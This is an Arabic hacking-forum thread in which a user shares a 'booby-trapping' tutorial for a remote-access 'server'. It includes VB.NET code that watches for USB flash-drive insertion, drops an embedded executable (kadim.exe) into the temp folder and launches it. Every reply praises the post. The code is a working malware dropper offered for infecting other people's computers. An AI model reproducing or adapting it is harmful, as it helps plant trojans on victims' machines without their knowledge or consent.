الوسوم:
حالة الموضوع:
مغلق
  1. KaDiM aL-iRaQi

    KaDiM aL-iRaQi ExpertDeveloper ExpErt DeveloPer

    الأنتساب:
    ‏2 سبتمبر 2014
    المشاركات:
    680
    الإعجابات المتلقاة:
    23
    نقاط الجائزة:
    18
    [​IMG]
    [​IMG]

    بسسم الله الرحمن الرحيم~..


    كيف الحال محبين وعشأق التلغيم~..


    بعد غيآب أيأم قليله نعود آليكم ~..


    بـتلغيمه شرطية ~..


    وهي عند أدخآأل آلفلاش يتم تشغيل السيرفر ~..


    آنشآء آلله تعجبكم ألتلغيمهَ نـتـركـكـم لمشآهده الفديوَ ~..

    [​IMG]
    [​IMG]

    [​IMG]

    آلكود آلموجود في آلشرح . ."


    [INFO]
    Private Const WM_DEVICECHANGE As Integer = &H219
    Private Const DBT_DEVICEARRIVAL As Integer = &H8000
    Private Const DBT_DEVICEREMOVECOMPLETE As Integer = &H8004


    Protected Overrides Sub WndProc(ByRef m As System.Windows.Forms.Message)
    If m.Msg = WM_DEVICECHANGE Then
    If m.WParam.ToInt32 = DBT_DEVICEARRIVAL Then
    MsgBox("ادخال الفلاش")

    Dim kadim = IO.Path.GetTempPath & "\" & "kadim.exe"
    IO.File.WriteAllBytes(kadim, My.Resources.IRAQ2)
    Process.Start(kadim)

    ElseIf m.WParam.ToInt32 = DBT_DEVICEREMOVECOMPLETE Then
    MsgBox("اخراج الفلاش")
    End If
    End If
    MyBase.WndProc(m)
    End Sub​
    [/INFO]
    [​IMG]

    فــي آمــآن آلــلــه
     
    1 person likes this.
  2. T3BaN_HaCkEr

    T3BaN_HaCkEr Developer

    الأنتساب:
    ‏11 نوفمبر 2011
    المشاركات:
    59
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    Palestinian
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك

    وجزاك الله خيرا


    شرح جميل ومفيد
     
  3. فيصــــــــل

    فيصــــــــل Developer

    الأنتساب:
    ‏3 أغسطس 2012
    المشاركات:
    40
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    السعودية
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    تســلم ايديك يالغالي جاري المشاهده
     
  4. wesker Hacker

    wesker Hacker Developer

    الأنتساب:
    ‏12 يناير 2013
    المشاركات:
    46
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    السلام عليكم ورحمة الله وبركاته
    موضوع رائع منك سلمت اناملك
    بارك الله فيك
    واصل من الافضل للأفضل
     
  5. ~iRaQi-Hacker~

    ~iRaQi-Hacker~ Developer

    الأنتساب:
    ‏7 نوفمبر 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    مششكوٍر قلبي ، آبدآع متوآصل ، تألق دآئم ، = {1$0}[​IMG]{1$0}
     
  6. Oth Màn

    Oth Màn Developer

    الأنتساب:
    ‏9 نوفمبر 2014
    المشاركات:
    9
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طالب
    الإقامة:
    C:/Windows/Morocco
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    رااائع استمر حبيبي
     
  7. Zero-737

    Zero-737 Developer

    الأنتساب:
    ‏15 نوفمبر 2012
    المشاركات:
    108
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    شكراً لك أخي وماقصرت :{1!}:
     
  8. General Rahmane

    General Rahmane Developer plus DeveloPer Plus

    الأنتساب:
    ‏31 أكتوبر 2014
    المشاركات:
    225
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    سلمت يداك ياغالي

    شرح جميل جداً

    :{11}: :{11}:
     
  9. مسلم السيلاوي

    مسلم السيلاوي DeveloPer Plus

    الأنتساب:
    ‏20 يوليو 2014
    المشاركات:
    154
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    احسنت وبارك الله فيك حبي
     
  10. Mr3amo

    Mr3amo Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    10
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: تلغيمه عند أدخال الفلاش يتم تشغيل السيرفر

    بارك الله فيك
    :{12}::{12}::{12}::{12}:
    وجزاك الله خيرا
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة